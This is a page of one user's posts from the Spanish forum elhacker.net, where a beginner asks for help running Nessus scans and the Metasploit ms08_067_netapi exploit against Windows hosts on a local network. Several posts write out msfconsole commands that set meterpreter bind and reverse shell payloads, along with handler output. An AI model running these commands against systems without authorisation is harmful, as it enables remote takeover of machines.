elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: (TUTORIAL) Aprende a emular Sentinel Dongle By Yapis


  Mostrar Mensajes
Páginas: 1 ... 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 [283] 284 285 286 287 288 289 290 291 292 293 294 295 296 297
2821  Seguridad Informática / Hacking / metasploit duda sobre vulnerabilidad 42411 en: 21 Marzo 2010, 17:47 pm
hola a todos
he seguido investigando y leyendo muchos tutoriales,etc  y  soy un mar de dudas :D :D
perdonar si digo muchas burradas...
escaneo con nessus, y me fijo en las vulnerabilidades que me da, sobre todo en el puerto 445.
voy a la zona de ports/protocols  y miro las vulnerabilidades del puerto 445,  y me dice que son 11.
creo q las ordena de mayor a menor riesgo  (  low  y high )
me fijo en la que pone high, y me pone  PLUGIN ID: 42411  y PLUGIN NAME: microsoft windows SMB shares unprivileged access.
ahora mi problema es saber como utilizar el metasploit con esa vulnerabilidad
suelo hacer:
./msfconsole

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.2
RHOST => 192.168.1.2
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit

y aqui viene el problema que siempre me pone que el exploit fue completado pero me pone algo  como q la  ip   o el host  was  unreachable  o algo asi, me da ese fallo.
se debe a q no estoy utilizando el exploit adecuado a esa vulnerabilidad?¿
muchas gracias y perdonar por el rollo que os he metido :D :D
un saludo
2822  Seguridad Informática / Hacking / Re: metasploit para vista en: 23 Febrero 2010, 17:13 pm
] Started reverse handler on 192.168.1.33:4444
  • Automatically detecting the target...
  • Fingerprint: Windows Vista Home Premium Service Pack 2 - lang:Unknown
  • Could not determine the exact language pack
  • Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) >


creo q ya he avanzado bastante :D:D  aunq estoy muy perdido aun...
segun me han dicho exploto bien  pero no se porque razon  no creo una sesion...
pero segui el tutorial ese  y consegui esto.
como lo puedo solucionar¿?¿ 
utilice el   set PAYLOAD windows/shell/reverse_tcp
si utilizo otros  puede darme mejores resultados?¿?¡
otra cosa , haciendo el escaner con nessus  me dio 14 vulnerabilidades   entre ellas el puerto  445  q es la q intente hacer,  pero si queiro probar otras  como se q utilizar en metasploit¿?¿   MEDIENTA  LA   ID¿?¿?¡     algun sitio q de informacion de esto¿?¡
mil gracias de nuevo
2823  Seguridad Informática / Hacking / Re: metasploit para vista en: 20 Febrero 2010, 11:54 am
Dudo que exista un tutorial de eso. Pero intentad Googlear un poco  :silbar:
lo intento creeme  :D:D:D   pero no veo la luz al final del tunel.
he visto un video en youtube  pero no se si me servira de mucho.
en modo terminal se puede tb manejar el nessus¿?¿'   
lo digo porque por ahi  quizas si haya algun sitio donde pongan algun comando  para ahcer el scan...
muchas gracias
2824  Seguridad Informática / Hacking / Re: metasploit para vista en: 19 Febrero 2010, 23:55 pm
bien  he conseguido entrar, lo malo es q ahora no se donde darle  para poder seguir el tutorial de la pagina de dragon jar  :(:(:(
conoces de algun sitio donde haya algun tutorial de el nessus  a traves de web¿?¿
gracias por toda la ayuda q me estas dando tio...
2825  Seguridad Informática / Hacking / Re: metasploit para vista en: 19 Febrero 2010, 23:52 pm
Lo encontre es... https://localhost:8834. Recordad conectate por https a tu propio pc (localhost o 127.0.0.1) en el puerto 8834, que es donde esta corriendo la interfaz de Nessus.
joder  yo no se donde encontrais las cosas  :D:D:D llevo 2 horas buscando (bueno no tantas :D:D ) loo pruebo y te comento
2826  Seguridad Informática / Hacking / Re: metasploit para vista en: 19 Febrero 2010, 23:43 pm
Con Browser, quiero decir, que se utiliza en una interfaz WEB. No recuerdo como es para ingresar al Scanner, pero es https://localhost:puerto. Lo que no recuerdo en este momento es el PORT...  :silbar:
sera la 1241  q es la tipica q utiliza¡?¿
probare y te comento
2827  Seguridad Informática / Hacking / Re: metasploit para vista en: 19 Febrero 2010, 23:28 pm
q es eso de q se usa por el browser¿?¿?
es por comandos  en terminal o algo asi¿?¿
donde puedo buscar informacion  o si tienes un tutorial tan bueno como el q estaba siguiendo
muchas gracais ded nuevo shellroot
2828  Seguridad Informática / Hacking / Re: metasploit para vista en: 19 Febrero 2010, 20:37 pm
la version de nessus q he instalado es:
Nessus-4.2.0-ubuntu810_i386.deb

y el nessus client:

NessusClient-4.0.2-ubuntu810_i386

seguramente este ahi el problema  no¿?¿'  ahora...  como lo soluciono¿?¿  :D:D
2829  Seguridad Informática / Hacking / Re: metasploit para vista en: 19 Febrero 2010, 20:20 pm
ah  debe de ser  en vez de poner una version mayor  una mas antigua para q funcione  o algo asi no¿?¡  downgraded    pero no se q comando poner o como hacerlo :(
gracias de nuevo
2830  Seguridad Informática / Hacking / Re: metasploit para vista en: 19 Febrero 2010, 20:16 pm
perdon, creia q eras tu.
con respecto a:

Cita de: https://discussions.nessus.org/message/2642
I had actually downgraded to Version 4.0.0 already to resolve the issue, but I'm sure that would fix my problem. Thanks for pointing that out.


he intentado mirar q es o a q hace referencia, pero no se que hacer, debe de ser de actualizar algo  o no se...   pero sinceramente  no tengo ni idea de que hacer ahora para solucionarlo :(:(
muchas gracias
Páginas: 1 ... 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 [283] 284 285 286 287 288 289 290 291 292 293 294 295 296 297
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines